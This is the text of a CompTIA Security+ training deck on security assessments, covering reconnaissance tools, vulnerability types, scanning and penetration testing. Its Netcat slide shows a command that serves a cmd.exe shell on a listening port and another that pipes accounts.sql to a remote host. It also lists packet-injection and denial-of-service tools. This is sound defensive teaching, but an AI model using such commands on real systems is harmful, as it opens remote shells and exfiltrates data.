reflection

profiletamerrabee3
sy0-601-03v1.0.pptx

Performing Security Assessments

Lesson 3

1

Assess Organizational Security with Network Reconnaissance Tools

Topic 3A

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

2

2

4.1 Given a scenario, use the appropriate tool to assess organizational security

Syllabus Objectives Covered

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

3

ipconfig, ping, and arp

Footprinting the network layout and rogue system detection

ipconfig/ifconfig/ip

Report the local IP configuration

ping

Test connectivity with a host

Use a ping sweep to detect live hosts on a subnet

arp

Address Resolution Protocol (ARP) cache

Shows IP to Media Access Control (MAC) address mapping

Detect spoofing (validate MAC of default gateway)

Screenshot used with permission from Microsoft.

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

4

route and traceroute

route

Show the local routing table

Identify default route and local subnet

Check for suspicious entries

tracert/traceroute

Test the path to a remote host

pathping/mtr

Measure latency

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

5

IP Scanners and Nmap

Host discovery

Test whether host in IP range responds to probes

Port scan

Test whether TCP or UDP port allows connections

Screenshot used with permission from nmap.org.

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

6

6

Service discovery

Scan custom TCP/UDP port ranges

Service and version detection

Fingerprinting each port

Protocol

Application/version

OS type

Device type

Service Discovery and Nmap

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

7

Screenshot used with permission from nmap.org.

netstat and nslookup

netstat

Report port status on local machine

Switches to filter by protocol

Display process name or PID that opened port

nslookup and dig

Query name servers

Zone transfers

Screenshot used with permission from Microsoft.

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

8

theHarvester

Collate open source intelligence (OSINT)

dnsenum

Collate DNS hosting information, name records, and IP schemas

scanless

Collate results from third-party port scanning sites

curl

Craft and submit protocol requests

Nessus

Perform automated vulnerability scanning

Other Reconnaissance and Discovery Tools

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

9

9

Packet analysis versus protocol analysis

Sniffer—tool for capturing network frames

Use software to interact with host network driver (libpcap/winpcap)

Mirrored ports/switched port analyzer (SPAN)

Use a test access port (TAP) device to read frames from network media

Placement of sensors

tcpdump

Write to pcap

Read from pcap

Filters

Packet Capture and tcpdump

tcpdump -i eth0 "src host 10.1.0.100 and (dst port 53 or dst port 80)"

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

10

Packet Analysis and Wireshark

Output panes

Packet list

Packet details (headers and fields)

Packet bytes (hex and ASCII)

Capture and display filters

Coloring rules

Follow TCP Stream

Screenshot used with permission from wireshark.org.

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

11

Packet Injection and Replay

Packet injection

Crafting spoofed packets

Dsniff, Ettercap, Scapy

hping

Host/port detection and firewall testing

Traceroute

Denial of service (DoS)

tcpreplay

Stream a packet capture through an interface

Sandbox analysis and intrusion detection testing

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

12

Exploitation Frameworks

Simulate adversary tools for exploitation and backdoor access

Metasploit

Modules to exploit known code vulnerabilities

Couple exploit module with payload

Obfuscate code to evade detection

Sn1Per

Penetration test reporting and evidence gathering

Run automated suites of tests

Other frameworks

Linux, embedded, browser, web/mobile app, cloud, ….

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

13

Screenshot used with permission from metasploit.com

13

Simple tool capable of very wide range of network tasks

Port scanning and fingerprinting

Command prompt listener over arbitrary port

File transfer over arbitrary port

Netcat

echo "head" | nc 10.1.0.1 -v 80

nc -l -p 666 -e cmd.exe

type accounts.sql | nc 10.1.0.192 6666

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

14

14

Organizational Security with Network Reconnaissance Tools

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

15

Review Activity

Assisted Labs

Scanning and Identifying Network Nodes

Intercepting and Interpreting Network Traffic with Packet Sniffing Tools

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

16

Lab Activity

Explain Security Concerns with General Vulnerability Types

Topic 3B

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

17

17

1.6 Explain the security concerns associated with various types of vulnerabilities

Syllabus Objectives Covered

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

18

Software Vulnerabilities and Patch Management

Exploits for faults in software code

Applications

Different impacts and exploit scenarios

Client versus server apps

Operating system (OS)

Obtain high level privileges

Firmware

PC firmware

Network appliances and Internet of Things devices

Improper or weak patch management

Undocumented assets

Failed updates and removed patches

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

19

19

Zero-day

Vulnerability is unknown to the vendor

Threat actor develops an exploit for which there is no patch

Likely to be used against high value targets

Legacy platform

Vendor no longer releases security patches

Zero-day and Legacy Platform Vulnerabilities

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

20

Default settings

Vendor may not release product in a default-secure configuration

Unsecured root accounts

Threat actor will gain complete control

Limit ability to login as superuser

Open permissions

Configuration errors allowing unauthenticated access

Allowing write access when only read access is appropriate

Weak Host Configurations

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

21

21

Weak Network Configurations

Open ports and services

Restrict using an access control list

Disable unnecessary services or block ports

Block at network perimeter

Unsecure protocols

Cleartext data transmissions are vulnerable to snooping and eavesdropping

Weak encryption

Storage and transport encryption

Key is generated from a weak password

Cipher has weaknesses

Key distribution is not secure

Errors

Error messages that reveal too much information

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

22

Data breaches and data exfiltration impacts

Data breach is where confidential data is read or transferred without authorization

Data exfiltration is the methods and tools by which an attacker transfers data without authorization

Identity theft

Abuse of data from privacy breaches

Data loss and availability loss impacts

Availability is also a critical security property

Financial and reputation impacts

Impacts from Vulnerabilities

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

23

23

Supply chains

Due diligence

Weak links

Vendor management

Process for selecting suppliers and evaluating risks

System integration

Lack of vendor support

Outsourced code development

Data storage

Cloud-based versus on-premises risks

Third-Party Risks

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

24

24

Security Concerns with General Vulnerability Types

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

25

Review Activity

Summarize Vulnerability Scanning Techniques

Topic 3C

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

26

26

1.7 Summarize the techniques used in security assessments

Syllabus Objectives Covered

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

27

Security Assessment Frameworks

Methodology and scope for security assessments

NIST SP 800-115

Testing

Examining

Interviewing

Vulnerability assessment versus threat hunting and penetration testing

Vulnerability assessments can use a mix of manual procedures and automated scanning tools

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

28

Vulnerability Scan Types

Automated scanners configured with list of known vulnerabilities

Network vulnerability scanner

Configured with tests for most types of network hosts

Focused on scanning OS plus some desktop and server applications

Application and web application scanners

Configured with application-specific tests

Screenshot used with permission from Greenbone Networks (openvas.org).

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

29

Common Vulnerabilities and Exposures

Vulnerability feed/plug-in/test

Security Content Automation Protocol (SCAP)

Mechanism for updating scanner via feed

Common identifiers

Common Vulnerabilities and Exposures (CVE)

Common Vulnerability Scoring System (CVSS)

Score Description
0.1+ Low
4.0+ Medium
7.0+ High
9.0+ Critical

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

30

Intrusive versus Non-intrusive Scanning

Remote scanning versus agent-based scanning

Non-intrusive scanning

Passively test security controls

Scanners attach to network and only sniff traffic

Possibly some low-interaction with hosts (port scanning/banner grabbing)

Intrusive/active scanning

Establish network session

Agent-based scan

Exploitation frameworks

Highly intrusive/risk of system crash

Used with penetration testing

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

31

Credentialed versus Non-credentialed Scanning

Non-credentialed

Anonymous or guest access to host only

Might test default passwords

Credentialed

Scan configured with logon

Can allow privileged access to configuration settings/logs/registry

Use dedicated account for scanning

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

32

Screenshot used with permission from Greenbone Networks (openvas.org).

False Positives, False Negatives, and Log Review

Analyzing and validating scan report contents

False positives

Scanner identifies a vulnerability that is not actually present

False negatives

Scanner fails to identify a vulnerability

Review logs to confirm results

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

33

Screenshot used with permission from Greenbone Networks (openvas.org).

Configuration Review

Lack of controls

Security controls that should be present but are not (or are not functioning)

Misconfiguration

Settings deviate from template configuration

Driven by templates of configuration settings

Open Vulnerability and Assessment Language (OVAL)

Extensible Configuration Checklist Description Format (XCCDF)

Compliance-based templates available in many products

Screenshot used with permission from Microsoft.

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

34

Use log and threat data to search for IoCs

Advisories and bulletins

Plan threat hunting project in response to newly discovered threat

Intelligence fusion and threat data

Use security information and event management (SIEM) and threat data feed to automate searches

Maneuver

Consider possibility of alerting adversary to the search

Use techniques that will give positional advantage

Threat Hunting

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

35

35

Vulnerability Scanning Techniques

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

36

Review Activity

Assisted Labs

Analyzing the Results of a Credentialed Vulnerability Scan

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

37

Lab Activity

Explain Penetration Testing Concepts

Topic 3D

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

38

38

1.8 Explain the techniques used in penetration testing

Syllabus Objectives Covered

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

39

Penetration Testing

Pen test or ethical hacking

Verify threat

Identify vulnerability and the vector by which it could be exploited

Bypass security controls

Identify lack of controls or ways to circumvent existing controls

Actively test security controls

Examine weaknesses that render controls ineffective

Exploit vulnerabilities to prove threat exists (“pwned”)

Active and highly intrusive techniques, compared to vulnerability assessment

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

40

Rules of Engagement

Agreement for objectives and scope

Authorization to proceed from system owner and affected third-parties

Attack profile

Black box (unknown environment)

White box (known environment)

Gray box (partially known environment—to model insider threat agents, for instance)

Bug bounty programs

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

41

Red team

Performs the offensive role

Blue team

Performs the defensive role

White team

Sets the rules of engagement and monitors the exercise

Purple team

Exercise set up to encourage collaboration

Red and blue teams share information and debrief regularly

Might be assisted by a facilitator

Exercise Types

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

42

42

Passive and Active Reconnaissance

Pen testing and kill chain attack life cycle

Reconnaissance phase

Passive techniques unlikely to alert target

Active techniques are detectable

Open Source Intelligence (OSINT)

Social engineering

Footprinting

War driving

Drones/unmanned aerial vehicle (UAV) and war flying

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

43

43

Pen Test Attack Life Cycle

Initial exploitation

Obtain a foothold via an exploit

Persistence

Establish a command & control backdoor

Reconnect across host shut down/user log off events

Privilege escalation

Internal reconnaissance

Gain additional credentials and compromise higher privilege accounts

Lateral movement

Compromise other hosts

Pivoting

Access hosts with no direct remote connection via a pivot host

Actions on objectives

Cleanup

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

44

Penetration Testing Concepts

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

45

Review Activity

Summary

Lesson 3

CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

46

46